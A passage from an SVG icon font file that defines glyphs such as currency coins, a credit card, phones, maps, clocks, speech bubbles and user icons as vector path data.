<glyph unicode="&#xed89;" glyph-name="coin-pound" d="M480 896c-265.096 0-480-214.904-480-480s214.904-480 480-480c265.098 0 480 214.902 480 480s-214.902 480-480 480zM480 32c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.074 0 384-171.922 384-384s-171.926-384-384-384zM608 256h-224v128h96c17.672 0 32 14.326 32 32s-14.328 32-32 32h-96v32c0 52.934 43.066 96 96 96 34.17 0 66.042-18.404 83.18-48.030 8.85-15.298 28.426-20.526 43.722-11.676 15.296 8.848 20.526 28.424 11.676 43.722-28.538 49.336-81.638 79.984-138.578 79.984-88.224 0-160-71.776-160-160v-32h-32c-17.672 0-32-14.326-32-32s14.328-32 32-32h32v-192h288c17.674 0 32 14.326 32 32s-14.326 32-32 32z" />
<glyph unicode="&#xed8a;" glyph-name="coin-yen" d="M480 896c-265.096 0-480-214.904-480-480s214.904-480 480-480c265.098 0 480 214.902 480 480s-214.902 480-480 480zM480 32c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.076 0 384-171.922 384-384s-171.924-384-384-384zM608 384c17.674 0 32 14.326 32 32s-14.326 32-32 32h-68.208l94.832 142.25c9.804 14.704 5.83 34.572-8.876 44.376-14.704 9.802-34.572 5.83-44.376-8.876l-101.372-152.062-101.374 152.062c-9.804 14.706-29.672 18.68-44.376 8.876-14.706-9.804-18.678-29.672-8.876-44.376l94.834-142.25h-68.208c-17.672 0-32-14.326-32-32s14.328-32 32-32h96v-64h-96c-17.672 0-32-14.326-32-32s14.328-32 32-32h96v-96c0-17.674 14.328-32 32-32s32 14.326 32 32v96h96c17.674 0 32 14.326 32 32s-14.326 32-32 32h-96v64h96z" />
<glyph unicode="&#xed8b;" glyph-name="credit-card" d="M928 832h-832c-52.8 0-96-43.2-96-96v-576c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v576c0 52.8-43.2 96-96 96zM96 768h832c17.346 0 32-14.654 32-32v-96h-896v96c0 17.346 14.654 32 32 32zM928 128h-832c-17.346 0-32 14.654-32 32v288h896v-288c0-17.346-14.654-32-32-32zM128 320h64v-128h-64zM256 320h64v-128h-64zM384 320h64v-128h-64z" />
<glyph unicode="&#xed8c;" glyph-name="calculator" d="M384 896h-320c-35.2 0-64-28.8-64-64v-320c0-35.2 28.796-64 64-64h320c35.2 0 64 28.8 64 64v320c0 35.2-28.8 64-64 64zM384 640h-320v64h320v-64zM896 896h-320c-35.204 0-64-28.8-64-64v-832c0-35.2 28.796-64 64-64h320c35.2 0 64 28.8 64 64v832c0 35.2-28.8 64-64 64zM896 320h-320v64h320v-64zM896 512h-320v64h320v-64zM384 384h-320c-35.2 0-64-28.8-64-64v-320c0-35.2 28.796-64 64-64h320c35.2 0 64 28.8 64 64v320c0 35.2-28.8 64-64 64zM384 128h-128v-128h-64v128h-128v64h128v128h64v-128h128v-64z" />
<glyph unicode="&#xed8d;" glyph-name="lifebuoy" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM320 448c0 106.040 85.96 192 192 192s192-85.96 192-192-85.96-192-192-192-192 85.96-192 192zM925.98 276.524v0l-177.42 73.49c12.518 30.184 19.44 63.276 19.44 97.986s-6.922 67.802-19.44 97.986l177.42 73.49c21.908-52.822 34.020-110.73 34.020-171.476s-12.114-118.654-34.020-171.476v0zM683.478 861.98v0 0l-73.49-177.42c-30.184 12.518-63.276 19.44-97.988 19.44s-67.802-6.922-97.986-19.44l-73.49 177.422c52.822 21.904 110.732 34.018 171.476 34.018 60.746 0 118.654-12.114 171.478-34.020zM98.020 619.476l177.422-73.49c-12.518-30.184-19.442-63.276-19.442-97.986s6.922-67.802 19.44-97.986l-177.42-73.49c-21.906 52.822-34.020 110.73-34.020 171.476s12.114 118.654 34.020 171.476zM340.524 34.020l73.49 177.42c30.184-12.518 63.276-19.44 97.986-19.44s67.802 6.922 97.986 19.44l73.49-177.42c-52.822-21.904-110.73-34.020-171.476-34.020-60.744 0-118.654 12.114-171.476 34.020z" />
<glyph unicode="&#xed8e;" glyph-name="phone" d="M704 320c-64-64-64-128-128-128s-128 64-192 128-128 128-128 192 64 64 128 128-128 256-192 256-192-192-192-192c0-128 131.5-387.5 256-512s384-256 512-256c0 0 192 128 192 192s-192 256-256 192z" />
<glyph unicode="&#xed8f;" glyph-name="phone-hang-up" d="M1017.378 384.006c8.004-55.482 13.216-131.392-11.664-160.446-41.142-48.044-301.712-48.044-301.712 48.042 0 48.398 42.856 80.134 1.712 128.178-40.472 47.262-113.026 48.030-193.714 48.042-80.686-0.012-153.242-0.78-193.714-48.042-41.142-48.046 1.714-79.78 1.714-128.178 0-96.086-260.57-96.086-301.714-48.044-24.878 29.054-19.668 104.964-11.662 160.446 6.16 37.038 21.724 76.996 71.548 127.994 0 0.002 0.002 0.002 0.002 0.004 74.738 69.742 187.846 126.738 429.826 127.968v0.030c1.344 0 2.664-0.010 4-0.014 1.338 0.004 2.656 0.014 4 0.014v-0.028c241.98-1.23 355.088-58.226 429.826-127.968 0.002-0.002 0.002-0.004 0.002-0.004 49.824-50.996 65.39-90.954 71.55-127.994z" />
<glyph unicode="&#xed90;" glyph-name="address-book" d="M192 960v-1024h768v1024h-768zM576 703.67c70.51 0 127.67-57.16 127.67-127.67s-57.16-127.67-127.67-127.67-127.67 57.16-127.67 127.67 57.16 127.67 127.67 127.67v0zM768 192h-384v64c0 70.696 57.306 128 128 128v0h128c70.696 0 128-57.304 128-128v-64zM64 896h96v-192h-96v192zM64 640h96v-192h-96v192zM64 384h96v-192h-96v192zM64 128h96v-192h-96v192z" />
<glyph unicode="&#xed91;" glyph-name="envelop" d="M928 832h-832c-52.8 0-96-43.2-96-96v-640c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v640c0 52.8-43.2 96-96 96zM398.74 409.628l-270.74-210.892v501.642l270.74-290.75zM176.38 704h671.24l-335.62-252-335.62 252zM409.288 398.302l102.712-110.302 102.71 110.302 210.554-270.302h-626.528l210.552 270.302zM625.26 409.628l270.74 290.75v-501.642l-270.74 210.892z" />
<glyph unicode="&#xed92;" glyph-name="pushpin" d="M544 960l-96-96 96-96-224-256h-224l176-176-272-360.616v-39.384h39.384l360.616 272 176-176v224l256 224 96-96 96 96-480 480zM448 416l-64 64 224 224 64-64-224-224z" />
<glyph unicode="&#xed93;" glyph-name="location" d="M512 960c-176.732 0-320-143.268-320-320 0-320 320-704 320-704s320 384 320 704c0 176.732-143.27 320-320 320zM512 448c-106.040 0-192 85.96-192 192s85.96 192 192 192 192-85.96 192-192-85.96-192-192-192z" />
<glyph unicode="&#xed94;" glyph-name="location2" d="M512 960c-176.732 0-320-143.268-320-320 0-320 320-704 320-704s320 384 320 704c0 176.732-143.27 320-320 320zM512 444c-108.248 0-196 87.752-196 196s87.752 196 196 196 196-87.752 196-196-87.752-196-196-196zM388 640c0 68.483 55.517 124 124 124s124-55.517 124-124c0-68.483-55.517-124-124-124s-124 55.517-124 124z" />
<glyph unicode="&#xed95;" glyph-name="compass" d="M544.010-64.004c-2.296 0-4.622 0.25-6.94 0.764-14.648 3.25-25.070 16.238-25.070 31.24v480h-480c-15.002 0-27.992 10.422-31.24 25.070-3.25 14.646 4.114 29.584 17.708 35.928l960 448c12.196 5.688 26.644 3.144 36.16-6.372 9.516-9.514 12.060-23.966 6.372-36.16l-448-960c-5.342-11.44-16.772-18.47-28.99-18.47zM176.242 512h367.758c17.674 0 32-14.328 32-32v-367.758l349.79 749.546-749.548-349.788z" />
<glyph unicode="&#xed96;" glyph-name="compass2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM96 448c0 229.75 186.25 416 416 416 109.574 0 209.232-42.386 283.534-111.628l-411.534-176.372-176.372-411.534c-69.242 74.302-111.628 173.96-111.628 283.534zM585.166 374.834l-256.082-109.75 109.75 256.082 146.332-146.332zM512 32c-109.574 0-209.234 42.386-283.532 111.628l411.532 176.372 176.372 411.532c69.242-74.298 111.628-173.958 111.628-283.532 0-229.75-186.25-416-416-416z" />
<glyph unicode="&#xed97;" glyph-name="map" d="M0 768l320 128v-768l-320-128zM384 928l320-192v-736l-320 160zM768 736l256 192v-768l-256-192z" />
<glyph unicode="&#xed98;" glyph-name="map2" d="M672 768l-320 128-352-128v-768l352 128 320-128 352 128v768l-352-128zM384 814.27l256-102.4v-630.138l-256 102.398v630.14zM64 723.172l256 93.090v-631.8l-256-93.088v631.798zM960 172.828l-256-93.092v631.8l256 93.090v-631.798z" />
<glyph unicode="&#xed99;" glyph-name="history" horiz-adv-x="1088" d="M640 896c247.424 0 448-200.576 448-448s-200.576-448-448-448v96c94.024 0 182.418 36.614 248.902 103.098s103.098 154.878 103.098 248.902c0 94.022-36.614 182.418-103.098 248.902s-154.878 103.098-248.902 103.098c-94.022 0-182.418-36.614-248.902-103.098-51.14-51.138-84.582-115.246-97.306-184.902h186.208l-224-256-224 256h164.57c31.060 217.102 217.738 384 443.43 384zM832 512v-128h-256v320h128v-192z" />
<glyph unicode="&#xed9a;" glyph-name="clock" d="M658.744 210.744l-210.744 210.746v282.51h128v-229.49l173.256-173.254zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 64c-212.078 0-384 171.922-384 384s171.922 384 384 384c212.078 0 384-171.922 384-384s-171.922-384-384-384z" />
<glyph unicode="&#xed9b;" glyph-name="clock2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM658.744 210.744l-210.744 210.746v282.51h128v-229.49l173.256-173.254-90.512-90.512z" />
<glyph unicode="&#xed9c;" glyph-name="alarm" d="M512 832c-247.424 0-448-200.576-448-448s200.576-448 448-448 448 200.576 448 448-200.576 448-448 448zM512 24c-198.824 0-360 161.178-360 360 0 198.824 161.176 360 360 360 198.822 0 360-161.176 360-360 0-198.822-161.178-360-360-360zM934.784 672.826c16.042 28.052 25.216 60.542 25.216 95.174 0 106.040-85.96 192-192 192-61.818 0-116.802-29.222-151.92-74.596 131.884-27.236 245.206-105.198 318.704-212.578v0zM407.92 885.404c-35.116 45.374-90.102 74.596-151.92 74.596-106.040 0-192-85.96-192-192 0-34.632 9.174-67.122 25.216-95.174 73.5 107.38 186.822 185.342 318.704 212.578zM512 384v256h-64v-320h256v64z" />
<glyph unicode="&#xed9d;" glyph-name="bell" d="M1025.5 160c0 288-256 224-256 448 0 18.56-1.788 34.42-5.048 47.928-16.83 113.018-92.156 203.72-189.772 231.36 0.866 3.948 1.32 8.032 1.32 12.21 0 33.278-28.8 60.502-64 60.502s-64-27.224-64-60.5c0-4.18 0.456-8.264 1.32-12.21-109.47-30.998-190.914-141.298-193.254-273.442-0.040-1.92-0.066-3.864-0.066-5.846 0-224.002-256-160.002-256-448.002 0-76.226 170.59-139.996 398.97-156.080 21.524-40.404 64.056-67.92 113.030-67.92s91.508 27.516 113.030 67.92c228.38 16.084 398.97 79.854 398.97 156.080 0 0.228-0.026 0.456-0.028 0.682l1.528-0.682zM826.246 105.904c-54.23-14.47-118.158-24.876-186.768-30.648-5.704 65.418-60.582 116.744-127.478 116.744s-121.774-51.326-127.478-116.744c-68.608 5.772-132.538 16.178-186.768 30.648-74.63 19.914-110.31 42.19-123.368 54.096 13.058 11.906 48.738 34.182 123.368 54.096 86.772 23.152 198.372 35.904 314.246 35.904s227.474-12.752 314.246-35.904c74.63-19.914 110.31-42.19 123.368-54.096-13.058-11.906-48.738-34.182-123.368-54.096z" />
<glyph unicode="&#xed9e;" glyph-name="stopwatch" d="M512.002 766.788v65.212h128v64c0 35.346-28.654 64-64.002 64h-191.998c-35.346 0-64-28.654-64-64v-64h128v-65.212c-214.798-16.338-384-195.802-384-414.788 0-229.75 186.25-416 416-416s416 186.25 416 416c0 218.984-169.202 398.448-384 414.788zM706.276 125.726c-60.442-60.44-140.798-93.726-226.274-93.726s-165.834 33.286-226.274 93.726c-60.44 60.44-93.726 140.8-93.726 226.274s33.286 165.834 93.726 226.274c58.040 58.038 134.448 91.018 216.114 93.548l-21.678-314.020c-1.86-26.29 12.464-37.802 31.836-37.802s33.698 11.512 31.836 37.802l-21.676 314.022c81.666-2.532 158.076-35.512 216.116-93.55 60.44-60.44 93.726-140.8 93.726-226.274s-33.286-165.834-93.726-226.274z" />
<glyph unicode="&#xed9f;" glyph-name="calendar" d="M320 576h128v-128h-128zM512 576h128v-128h-128zM704 576h128v-128h-128zM128 192h128v-128h-128zM320 192h128v-128h-128zM512 192h128v-128h-128zM320 384h128v-128h-128zM512 384h128v-128h-128zM704 384h128v-128h-128zM128 384h128v-128h-128zM832 960v-64h-128v64h-448v-64h-128v64h-128v-1024h960v1024h-128zM896 0h-832v704h832v-704z" />
<glyph unicode="&#xeda0;" glyph-name="printer" d="M256 896h512v-128h-512v128zM960 704h-896c-35.2 0-64-28.8-64-64v-320c0-35.2 28.794-64 64-64h192v-256h512v256h192c35.2 0 64 28.8 64 64v320c0 35.2-28.8 64-64 64zM128 512c-35.346 0-64 28.654-64 64s28.654 64 64 64 64-28.654 64-64-28.652-64-64-64zM704 64h-384v320h384v-320z" />
<glyph unicode="&#xeda1;" glyph-name="keyboard" horiz-adv-x="1152" d="M1088 832h-1024c-35.2 0-64-28.8-64-64v-640c0-35.2 28.8-64 64-64h1024c35.2 0 64 28.8 64 64v640c0 35.2-28.8 64-64 64zM640 704h128v-128h-128v128zM832 512v-128h-128v128h128zM448 704h128v-128h-128v128zM640 512v-128h-128v128h128zM256 704h128v-128h-128v128zM448 512v-128h-128v128h128zM128 704h64v-128h-64v128zM128 512h128v-128h-128v128zM192 192h-64v128h64v-128zM768 192h-512v128h512v-128zM1024 192h-192v128h192v-128zM1024 384h-128v128h128v-128zM1024 576h-192v128h192v-128z" />
<glyph unicode="&#xeda2;" glyph-name="display" d="M0 896v-640h1024v640h-1024zM960 320h-896v512h896v-512zM672 192h-320l-32-128-64-64h512l-64 64z" />
<glyph unicode="&#xeda3;" glyph-name="laptop" d="M896 256v512c0 35.2-28.8 64-64 64h-640c-35.2 0-64-28.8-64-64v-512h-128v-192h1024v192h-128zM640 128h-256v64h256v-64zM832 256h-640v511.886c0.034 0.040 0.076 0.082 0.114 0.114h639.77c0.040-0.034 0.082-0.076 0.116-0.116v-511.884z" />
<glyph unicode="&#xeda4;" glyph-name="mobile" d="M736 960h-448c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h448c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM384 912h256v-32h-256v32zM512 0c-35.346 0-64 28.654-64 64s28.654 64 64 64 64-28.654 64-64-28.654-64-64-64zM768 192h-512v640h512v-640z" />
<glyph unicode="&#xeda5;" glyph-name="mobile2" d="M768 960h-576c-35.2 0-64-28.798-64-64v-896c0-35.2 28.798-64 64-64h576c35.2 0 64 28.8 64 64v896c0 35.202-28.8 64-64 64zM480-17.782c-27.492 0-49.782 22.29-49.782 49.782s22.29 49.782 49.782 49.782 49.782-22.29 49.782-49.782-22.29-49.782-49.782-49.782zM768 128h-576v704h576v-704z" />
<glyph unicode="&#xeda6;" glyph-name="tablet" d="M800 960h-640c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h640c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM480-32c-17.672 0-32 14.326-32 32s14.328 32 32 32 32-14.326 32-32-14.328-32-32-32zM768 64h-576v768h576v-768z" />
<glyph unicode="&#xeda7;" glyph-name="tv" d="M981.188 671.892c-88.808 12.768-183.382 22.016-282.076 27.22l164.888 164.888-64 64-224.558-224.556c-21.006 0.368-42.156 0.556-63.442 0.556v0l-256 256-64-64 194.196-194.196c-120.922-4.242-236.338-14.524-343.386-29.912-27.532-107.726-42.81-226.752-42.81-351.892s15.278-244.166 42.804-351.89c143.642-20.652 302.34-32.11 469.196-32.11s325.55 11.458 469.188 32.11c27.534 107.724 42.812 226.75 42.812 351.89s-15.278 244.166-42.812 351.892zM863.892 85.406c-107.73-13.766-226.75-21.406-351.892-21.406s-244.166 7.64-351.892 21.406c-20.648 71.816-32.108 151.166-32.108 234.594 0 83.43 11.458 162.78 32.108 234.596 107.726 13.766 226.75 21.404 351.892 21.404 125.136 0 244.162-7.638 351.886-21.404 20.656-71.816 32.114-151.166 32.114-234.596 0-83.428-11.458-162.778-32.108-234.594z" />
<glyph unicode="&#xeda8;" glyph-name="drawer" d="M1016.988 307.99l-256 320c-6.074 7.592-15.266 12.010-24.988 12.010h-448c-9.72 0-18.916-4.418-24.988-12.010l-256-320c-4.538-5.674-7.012-12.724-7.012-19.99v-288c0-35.346 28.654-64 64-64h896c35.348 0 64 28.654 64 64v288c0 7.266-2.472 14.316-7.012 19.99zM960 256h-224l-128-128h-192l-128 128h-224v20.776l239.38 299.224h417.24l239.38-299.224v-20.776zM736 448h-448c-17.672 0-32 14.328-32 32s14.328 32 32 32h448c17.674 0 32-14.328 32-32s-14.326-32-32-32zM800 320h-576c-17.672 0-32 14.326-32 32s14.328 32 32 32h576c17.674 0 32-14.326 32-32s-14.326-32-32-32z" />
<glyph unicode="&#xeda9;" glyph-name="drawer2" d="M1016.988 307.99l-256 320c-6.074 7.592-15.266 12.010-24.988 12.010h-448c-9.72 0-18.916-4.418-24.988-12.010l-256-320c-4.538-5.674-7.012-12.724-7.012-19.99v-288c0-35.346 28.654-64 64-64h896c35.348 0 64 28.654 64 64v288c0 7.266-2.472 14.316-7.012 19.99zM960 256h-224l-128-128h-192l-128 128h-224v20.776l239.38 299.224h417.24l239.38-299.224v-20.776z" />
<glyph unicode="&#xedaa;" glyph-name="box-add" d="M832 896h-640l-192-192v-672c0-17.674 14.326-32 32-32h960c17.672 0 32 14.326 32 32v672l-192 192zM512 128l-320 256h192v192h256v-192h192l-320-256zM154.51 768l64 64h586.978l64-64h-714.978z" />
<glyph unicode="&#xedab;" glyph-name="box-remove" d="M832 896h-640l-192-192v-672c0-17.674 14.326-32 32-32h960c17.672 0 32 14.326 32 32v672l-192 192zM640 320v-192h-256v192h-192l320 256 320-256h-192zM154.51 768l64 64h586.976l64-64h-714.976z" />
<glyph unicode="&#xedac;" glyph-name="download" d="M512 384l256 256h-192v256h-128v-256h-192zM744.726 488.728l-71.74-71.742 260.080-96.986-421.066-157.018-421.066 157.018 260.080 96.986-71.742 71.742-279.272-104.728v-256l512-192 512 192v256z" />
<glyph unicode="&#xedad;" glyph-name="upload" d="M448 384h128v256h192l-256 256-256-256h192zM640 528v-98.712l293.066-109.288-421.066-157.018-421.066 157.018 293.066 109.288v98.712l-384-144v-256l512-192 512 192v256z" />
<glyph unicode="&#xedae;" glyph-name="floppy-disk" d="M896 960h-896v-1024h1024v896l-128 128zM512 832h128v-256h-128v256zM896 64h-768v768h64v-320h576v320h74.978l53.022-53.018v-714.982z" />
<glyph unicode="&#xedaf;" glyph-name="drive" d="M192 64h640c106.038 0 192 85.96 192 192h-1024c0-106.040 85.962-192 192-192zM832 192h64v-64h-64v64zM960 832h-896l-64-512h1024z" />
<glyph unicode="&#xedb0;" glyph-name="database" d="M512 960c-282.77 0-512-71.634-512-160v-128c0-88.366 229.23-160 512-160s512 71.634 512 160v128c0 88.366-229.23 160-512 160zM512 416c-282.77 0-512 71.634-512 160v-192c0-88.366 229.23-160 512-160s512 71.634 512 160v192c0-88.366-229.23-160-512-160zM512 128c-282.77 0-512 71.634-512 160v-192c0-88.366 229.23-160 512-160s512 71.634 512 160v192c0-88.366-229.23-160-512-160z" />
<glyph unicode="&#xedb1;" glyph-name="undo" d="M512 896c-141.384 0-269.376-57.32-362.032-149.978l-149.968 149.978v-384h384l-143.532 143.522c69.496 69.492 165.492 112.478 271.532 112.478 212.068 0 384-171.924 384-384 0-114.696-50.292-217.636-130.018-288l84.666-96c106.302 93.816 173.352 231.076 173.352 384 0 282.77-229.23 512-512 512z" />
<glyph unicode="&#xedb2;" glyph-name="redo" d="M0 384c0-152.924 67.048-290.184 173.35-384l84.666 96c-79.726 70.364-130.016 173.304-130.016 288 0 212.076 171.93 384 384 384 106.042 0 202.038-42.986 271.53-112.478l-143.53-143.522h384v384l-149.97-149.978c-92.654 92.658-220.644 149.978-362.030 149.978-282.77 0-512-229.23-512-512z" />
<glyph unicode="&#xedb3;" glyph-name="undo2" d="M761.862-64c113.726 206.032 132.888 520.306-313.862 509.824v-253.824l-384 384 384 384v-248.372c534.962 13.942 594.57-472.214 313.862-775.628z" />
<glyph unicode="&#xedb4;" glyph-name="redo2" d="M576 711.628v248.372l384-384-384-384v253.824c-446.75 10.482-427.588-303.792-313.86-509.824-280.712 303.414-221.1 789.57 313.86 775.628z" />
<glyph unicode="&#xedb5;" glyph-name="forward" d="M262.14 960c-113.728-206.032-132.89-520.304 313.86-509.824v253.824l384-384-384-384v248.372c-534.96-13.942-594.572 472.214-313.86 775.628z" />
<glyph unicode="&#xedb6;" glyph-name="reply" d="M448 184.372v-248.372l-384 384 384 384v-253.824c446.75-10.48 427.588 303.792 313.862 509.824 280.71-303.414 221.1-789.57-313.862-775.628z" />
<glyph unicode="&#xedb7;" glyph-name="bubble" d="M512 896c282.77 0 512-186.25 512-416 0-229.752-229.23-416-512-416-27.156 0-53.81 1.734-79.824 5.044-109.978-109.978-241.25-129.7-368.176-132.596v26.916c68.536 33.578 128 94.74 128 164.636 0 9.754-0.758 19.33-2.164 28.696-115.796 76.264-189.836 192.754-189.836 323.304 0 229.75 229.23 416 512 416z" />
<glyph unicode="&#xedb8;" glyph-name="bubbles" horiz-adv-x="1152" d="M1088 58.834c0-45.5 26.028-84.908 64-104.184v-15.938c-10.626-1.454-21.472-2.224-32.5-2.224-68.008 0-129.348 28.528-172.722 74.264-26.222-6.982-54.002-10.752-82.778-10.752-159.058 0-288 114.616-288 256s128.942 256 288 256c159.058 0 288-114.616 288-256 0-55.348-19.764-106.592-53.356-148.466-6.824-14.824-10.644-31.312-10.644-48.7zM512 960c278.458 0 504.992-180.614 511.836-405.52-49.182 21.92-103.586 33.52-159.836 33.52-95.56 0-185.816-33.446-254.138-94.178-70.846-62.972-109.862-147.434-109.862-237.822 0-44.672 9.544-87.888 27.736-127.788-5.228-0.126-10.468-0.212-15.736-0.212-27.156 0-53.81 1.734-79.824 5.044-109.978-109.978-241.25-129.7-368.176-132.596v26.916c68.536 33.578 128 94.74 128 164.636 0 9.754-0.758 19.33-2.164 28.696-115.796 76.264-189.836 192.754-189.836 323.304 0 229.75 229.23 416 512 416z" />
<glyph unicode="&#xedb9;" glyph-name="bubbles2" horiz-adv-x="1152" d="M480 960v0c265.096 0 480-173.914 480-388.448s-214.904-388.448-480-388.448c-25.458 0-50.446 1.62-74.834 4.71-103.106-102.694-222.172-121.108-341.166-123.814v25.134c64.252 31.354 116 88.466 116 153.734 0 9.106-0.712 18.048-2.030 26.794-108.558 71.214-177.97 179.988-177.97 301.89 0 214.534 214.904 388.448 480 388.448zM996 89.314c0-55.942 36.314-104.898 92-131.772v-21.542c-103.126 2.318-197.786 18.102-287.142 106.126-21.14-2.65-42.794-4.040-64.858-4.040-95.47 0-183.408 25.758-253.614 69.040 144.674 0.506 281.26 46.854 384.834 130.672 52.208 42.252 93.394 91.826 122.414 147.348 30.766 58.866 46.366 121.582 46.366 186.406 0 10.448-0.45 20.836-1.258 31.168 72.57-59.934 117.258-141.622 117.258-231.676 0-104.488-60.158-197.722-154.24-258.764-1.142-7.496-1.76-15.16-1.76-22.966z" />
<glyph unicode="&#xedba;" glyph-name="bubble2" d="M512 768c-54.932 0-107.988-8.662-157.694-25.742-46.712-16.054-88.306-38.744-123.628-67.444-66.214-53.798-102.678-122.984-102.678-194.814 0-40.298 11.188-79.378 33.252-116.152 22.752-37.92 56.982-72.586 98.988-100.252 30.356-19.992 50.78-51.948 56.176-87.894 1.8-11.984 2.928-24.088 3.37-36.124 7.47 6.194 14.75 12.846 21.88 19.976 24.154 24.152 56.78 37.49 90.502 37.49 5.368 0 10.762-0.336 16.156-1.024 20.974-2.666 42.398-4.020 63.676-4.020 54.934 0 107.988 8.66 157.694 25.742 46.712 16.054 88.306 38.744 123.628 67.444 66.214 53.796 102.678 122.984 102.678 194.814s-36.464 141.016-102.678 194.814c-35.322 28.698-76.916 51.39-123.628 67.444-49.706 17.080-102.76 25.742-157.694 25.742zM512 896v0c282.77 0 512-186.25 512-416 0-229.752-229.23-416-512-416-27.156 0-53.81 1.734-79.824 5.044-109.978-109.978-241.25-129.7-368.176-132.596v26.916c68.536 33.578 128 94.74 128 164.636 0 9.754-0.758 19.33-2.164 28.696-115.796 76.264-189.836 192.754-189.836 323.304 0 229.75 229.23 416 512 416z" />
<glyph unicode="&#xedbb;" glyph-name="bubbles3" horiz-adv-x="1152" d="M1088 58.834c0-45.5 26.028-84.908 64-104.184v-15.938c-10.626-1.454-21.472-2.224-32.5-2.224-68.008 0-129.348 28.528-172.722 74.264-26.222-6.982-54.002-10.752-82.778-10.752-159.058 0-288 114.616-288 256s128.942 256 288 256c159.058 0 288-114.616 288-256 0-55.348-19.764-106.592-53.356-148.466-6.824-14.824-10.644-31.312-10.644-48.7zM230.678 738.814c-66.214-53.798-102.678-122.984-102.678-194.814 0-40.298 11.188-79.378 33.252-116.15 22.752-37.92 56.982-72.586 98.988-100.252 30.356-19.992 50.78-51.948 56.176-87.894 1.8-11.984 2.928-24.088 3.37-36.124 7.47 6.194 14.75 12.846 21.88 19.976 24.154 24.152 56.78 37.49 90.502 37.49 5.368 0 10.762-0.336 16.156-1.024 20.948-2.662 42.344-4.016 63.594-4.020v-128c-27.128 0.002-53.754 1.738-79.742 5.042-109.978-109.978-241.25-129.7-368.176-132.596v26.916c68.536 33.578 128 94.74 128 164.636 0 9.754-0.758 19.33-2.164 28.696-115.796 76.264-189.836 192.754-189.836 323.304 0 229.75 229.23 416 512 416 278.458 0 504.992-180.614 511.836-405.52-41.096 18.316-85.84 29.422-132.262 32.578-11.53 56.068-45.402 108.816-98.252 151.756-35.322 28.698-76.916 51.39-123.628 67.444-49.706 17.080-102.76 25.742-157.694 25.742-54.932 0-107.988-8.662-157.694-25.742-46.712-16.054-88.306-38.744-123.628-67.444z" />
<glyph unicode="&#xedbc;" glyph-name="bubbles4" horiz-adv-x="1152" d="M480 832c-50.666 0-99.582-7.95-145.386-23.628-42.924-14.694-81.114-35.436-113.502-61.646-60.044-48.59-93.112-110.802-93.112-175.174 0-35.99 10.066-70.948 29.92-103.898 20.686-34.34 51.898-65.794 90.26-90.958 30.44-19.968 50.936-51.952 56.362-87.95 0.902-5.99 1.63-12.006 2.18-18.032 2.722 2.52 5.424 5.114 8.114 7.794 24.138 24.040 56.688 37.312 90.322 37.312 5.348 0 10.718-0.336 16.094-1.018 19.36-2.452 39.124-3.696 58.748-3.696 50.666 0 99.58 7.948 145.384 23.628 42.926 14.692 81.116 35.434 113.504 61.644 60.046 48.59 93.112 110.802 93.112 175.174s-33.066 126.582-93.112 175.174c-32.388 26.212-70.578 46.952-113.504 61.646-45.804 15.678-94.718 23.628-145.384 23.628zM480 960v0c265.096 0 480-173.914 480-388.448s-214.904-388.448-480-388.448c-25.458 0-50.446 1.62-74.834 4.71-103.106-102.694-222.172-121.108-341.166-123.814v25.134c64.252 31.354 116 88.466 116 153.734 0 9.106-0.712 18.048-2.030 26.794-108.558 71.214-177.97 179.988-177.97 301.89 0 214.534 214.904 388.448 480 388.448zM996 89.314c0-55.942 36.314-104.898 92-131.772v-21.542c-103.126 2.318-197.786 18.102-287.142 106.126-21.14-2.65-42.794-4.040-64.858-4.040-95.47 0-183.408 25.758-253.614 69.040 144.674 0.506 281.26 46.854 384.834 130.672 52.208 42.252 93.394 91.826 122.414 147.348 30.766 58.866 46.366 121.582 46.366 186.406 0 10.448-0.45 20.836-1.258 31.168 72.57-59.934 117.258-141.622 117.258-231.676 0-104.488-60.158-197.722-154.24-258.764-1.142-7.496-1.76-15.16-1.76-22.966z" />
<glyph unicode="&#xedbd;" glyph-name="user" d="M576 253.388v52.78c70.498 39.728 128 138.772 128 237.832 0 159.058 0 288-192 288s-192-128.942-192-288c0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h896c0 128.968-166.898 235.64-384 253.388z" />
<glyph unicode="&#xedbe;" glyph-name="users" horiz-adv-x="1152" d="M768 189.388v52.78c70.498 39.728 128 138.772 128 237.832 0 159.058 0 288-192 288s-192-128.942-192-288c0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h896c0 128.968-166.898 235.64-384 253.388zM327.196 164.672c55.31 36.15 124.080 63.636 199.788 80.414-15.054 17.784-28.708 37.622-40.492 59.020-30.414 55.234-46.492 116.058-46.492 175.894 0 86.042 0 167.31 30.6 233.762 29.706 64.504 83.128 104.496 159.222 119.488-16.914 76.48-61.94 126.75-181.822 126.75-192 0-192-128.942-192-288 0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h279.006c14.518 12.91 30.596 25.172 48.19 36.672z" />
<glyph unicode="&#xedbf;" glyph-name="user-plus" d="M384 224c0 151.234 95.874 280.486 230.032 330.2 16.28 36.538 25.968 77.164 25.968 117.8 0 159.058 0 288-192 288s-192-128.942-192-288c0-99.060 57.502-198.104 128-237.832v-52.78c-217.102-17.748-384-124.42-384-253.388h397.306c-8.664 30.53-13.306 62.732-13.306 96zM736 512c-159.058 0-288-128.942-288-288s128.942-288 288-288c159.056 0 288 128.942 288 288s-128.942 288-288 288zM896 192h-128v-128h-64v128h-128v64h128v128h64v-128h128v-64z" />
